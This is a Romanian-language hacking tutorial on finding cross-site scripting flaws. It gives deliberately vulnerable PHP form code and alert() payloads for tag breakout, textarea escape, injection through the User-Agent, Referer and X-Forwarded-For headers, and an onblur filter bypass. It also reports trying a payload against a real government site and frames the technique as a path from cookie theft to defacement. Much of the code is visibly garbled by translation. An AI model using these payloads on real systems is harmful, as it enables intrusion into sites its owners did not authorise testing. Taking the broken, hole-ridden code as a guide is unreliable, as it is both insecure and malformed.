Leaderboard

Nu ne limitam sa gasim xss ca de obicei cu tipicul script <script>alert("XSS")</script> Una dintre cele mai comune vulneranbilitati in ziua de azi foarte periculoasa ca toate este ca daca sti sa te folosesti de ele, poti face orice vrei.. Cazu 1 orice vulnerabilitate este limitata atata cat vrei tu.. incepand cu Cookies pana la un deface, doar iti trebuie 2 lucrurii esentiale, 1) mentalitate 2) imaginatie dupa aia limita e cerul.. unu din cazurile cele mai comune codul vulnerabil : <html> <head> <title> Formular de cautare </ title> </ head> <body> <center> <? if (isset ($ _POST [Text])) { $ XSS = $ _POST [text]; dor "name = \" XSS \ "metoda = \" POST \ "> <form <h1> 0 rezultate </ h1> <br> <hr> <br> <input type = \ "text \" value = \ "$ XSS \ "name = \" text \ "> <br> <input type=\"submit\" value=\"Cautare\"> </ form> "; } else { echo "<forma nume = \ "XSS \" metoda = \ "POST \"> <h1> Formular de c?utare </ h1> <br> <hr> <br> <input type = \ "text \" value = \ "\" name = \ " textul \ "> <br> <input type=\"submit\" value=\"Cautare\"> </form>"; } ?> </ center> </ body> </ html> Cum vedem in source daca cautam ceva, orice cautam ramane in from asta e usor scriem “>Becali– "><script>alert("XSS")</script> ceea ce e logic ca ar ramane asa <input type=”text” value=””> Cazu 2 : Limitarea in anumite caractere / Campuri de text limitate un alt caz foarte comun va las aici minunea http://www.gov.ro/ Nu se putea adauga nimic in from ceva de genu : “>$#-|/()=\*¿?[/CODE nici un caracter special, cautand simplu cuvant (buna) rezultatul a fost acesta [CODE]resultatgeneral.jsp?cuvantul=buna&servici=0 asa ca am facut in felul urmator, http://url/resultatgeneral.jsp?cuvant=”><script>alert(/OK/)</script>&servici=0[b] Bingo [/b] asta se poate face cu TAMPER DATA (ADDON De Firefox). modificarea continutului ce se trimite prin post cazu 3 Textarea <textarea style="width:320px; height:120px" name=message></textarea> cum se poate vedea cu un simplu "> nu merge bypass daca introducem un text va arata asa <textarea style="width:320px; height:120px" name=message>Mensaje </textarea> </textarea><script>alert(/PWNED/)</script> ar ramane asa : <textarea style="width:320px; height:120px" name=message> </textarea> <script>alert(/PWNED/)</script> </textarea> Headers Astai foarte interesanta ne jucam cu Headers sa scoatem un xss 1 – User Agent Source: <?php $nav = $_SERVER['HTTP_USER_AGENT']; echo "<b><center><h1>browser:</h1><br><hr><br>$nav</center></b>"; ?> Header: Host: localhost User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive si daca al modificam: Host: localhost User-Agent: numi aduc aminte de nume :$ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Y … User-Agent: <script>alert(/Yeah/)</script> 2 – Referer Header: host : Ce IP am? Care este IP-ul meu? User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.google.com.do/ Cookie: ****** si daca al modificam : host : Ce IP am? Care este IP-ul meu? User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: <script>alert(/Yeah/)</script> Cookie: ****** 3 - X-Forwarded-For host : Ce IP am? Care este IP-ul meu? User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.google.com/ X-Forwarded-For: 127.0.0.1 Cookie: ****** fiind 127.0.0.1 IP A Spoofear. asta ne da ca output la IP in cazul acesta ar fii 127.0.0.1 host : Host: ********* User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://google.com X-Forwarded-For: <script>alert(/Yeah/)</script> Cookie: ****** e la fel ca un xss STR_Replace ce sa faceti daca gasitii un script pentru xss <?php if(isset($_GET[xss])){ $xss = $_GET['xss']; $xss2 = str_replace("<script>", "", $xss); $xss3 = str_replace("alert", "", $xss2); echo "<form name=\"Hi\"> <input type=\"text\" value=\"$xss3\" size=\"30\"> </form>"; } ?> daca intentam sa punem <script>alert(Yeah)</script> .. ar ramane asa alert(Yeah)</script> si pentru asta nu se produce alert dar incercam sa ajungem mai incolo cum vedem in source si cautam ( aaaa) astai rezultatul <input type="text" value="aaa" size="30"> parea ceva simplu de “><script>alert(WTF)</script> dar nu putem folosi script asa ca doar ne ramane sa ne gandim scriptul este complet vulnerabil codurile se imprima asa cum ajung doar excuind <script> aici o sa folosim javascript http://www.w3schools.com/js/js_events.asp). folosim : onblur introducem : Onblur=alert(000) nu se produce alerta ramane inauntru in from si pentru asta daca introducem bufnita ar fi asa <input type="text" value="" bufnita size=”30”> asa ca valoarea de from, ar fi nula “ Onblur=alert(666) “ <input type="text" value="" “ Onblur=alert(666) “ size=”30”> in acest caz am adauga o proprietate de avent in input provocand un xss !! Bafta...